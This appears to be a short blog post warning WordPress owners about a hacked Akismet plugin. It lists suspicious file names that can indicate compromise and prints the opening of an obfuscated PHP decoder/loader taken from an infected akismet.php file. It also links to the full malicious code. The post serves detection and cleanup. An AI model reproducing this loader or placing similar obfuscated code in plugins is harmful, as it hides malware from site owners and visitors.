Akismet Hacked

If your WordPress site has been compromised, try checking out your Akismet plugin. It’s so commonly used that its often subject to attacks.

If any of these files are showing up in your plugins folder, you may be the subject of an attack:

1. .akismet.cache.php
2. .akismet.bak.php
3. .akismet.old.php
4. class-akismet.php
5. db-akismet.php

One akismet.php file that I found started out something like this:

<?php if (!function_exists("TC9A16C47DA8EEE87")) {
    function TC9A16C47DA8EEE87($T059EC46CFE335260) {
        $T059EC46CFE335260 = base64_decode($T059EC46CFE335260);
        $TC9A16C47DA8EEE87 = 0;
        $TA7FB8B0A1C0E2E9E = 0;
        $T17D35BB9DF7A47E4 = 0;
        $T65CE9F6823D588A7 = (ord($T059EC46CFE335260[1]) << 8) + ord($T059EC46CFE335260[2]);
        $TBF14159DC7D007D3 = 3;
        $T77605D5F26DD5248 = 0;
        $T4A747C3263CA7A55 = 16;
        $T7C7E72B89B83E235 = "";
        $T0D47BDF6FD9DDE2E = strlen($T059EC46CFE335260);
        $T43D5686285035C13 = __FILE__;
        $T43D5686285035C13 = file_get_contents($T43D5686285035C13);
        $T6BBC58A3B5B11DC4 = 0;
        preg_match(base64_decode("LyhwcmludHxzcHJpbnR8ZWNobykv"), $T43D5686285035C13, $T6BBC58A3B5B11DC4);
        for (;$TBF14159DC7D007D3 < $T0D47BDF6FD9DDE2E;) {
            if (count($T6BBC58A3B5B11DC4)) exit;
            if ($T4A747C3263CA7A55 == 0) {
                $T65CE9F6823D588A7 = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) << 8);
                $T65CE9F6823D588A7+= ord($T059EC46CFE335260[$TBF14159DC7D007D3++]);
                $T4A747C3263CA7A55 = 16;
            }
            if ($T65CE9F6823D588A7 & 0x8000) {
                $TC9A16C47DA8EEE87 = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) << 4);
                $TC9A16C47DA8EEE87+= (ord($T059EC46CFE335260[$TBF14159DC7D007D3]) >> 4);
                if ($TC9A16C47DA8EEE87) {
                    $TA7FB8B0A1C0E2E9E = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) & 0x0F) + 3;
                    for ($T17D35BB9DF7A47E4 = 0;$T17D35BB9DF7A47E4 < $TA7FB8B0A1C0E2E9E;$T17D35BB9DF7A47E4++) $T7C7E72B89B83E235[$T77605D5F26DD5248 + $T17D35BB9DF7A47E4] = $T7C7E72B89B83E235[$T77605D5F26DD5248 - $TC9A16C47DA8EEE87 + $T17D35BB9DF7A47E4];
                    $T77605D5F26DD5248+= $TA7FB8B0A1C0E2E9E;
                } else {
                    $TA7FB8B0A1C0E2E9E = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) << 8);
                    $TA7FB8B0A1C0E2E9E+= ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) + 16;
                    for ($T17D35BB9DF7A47E4 = 0;$T17D35BB9DF7A47E4 < $TA7FB8B0A1C0E2E9E;$T7C7E72B89B83E235[$T77605D5F26DD5248 + $T17D35BB9DF7A47E4++] = $T059EC46CFE335260[$TBF14159DC7D007D3]);
                    $TBF14159DC7D007D3++;
                    $T77605D5F26DD5248+= $TA7FB8B0A1C0E2E9E;
                }
            } else $T7C7E72B89B83E235[$T77605D5F26DD5248++] = $T059EC46CFE335260[$TBF14159DC7D007D3++];
            $T65CE9F6823D588A7 <<= 1;
            $T4A747C3263CA7A55--;
            if ($TBF14159DC7D007D3 == $T0D47BDF6FD9DDE2E) {
                $T43D5686285035C13 = implode("", $T7C7E72B89B83E235);
                $T43D5686285035C13 = "?" . ">" . $T43D5686285035C13;
                return $T43D5686285035C13;
            }
        }
    }
};
?>

If you want the PHP code, which is obfuscated, for the akismet.php file I came across, visit this page: http://codepaste.net/jc2996

See this post regarding the Pharma Hack for more information.

Related Posts:

• No Related Posts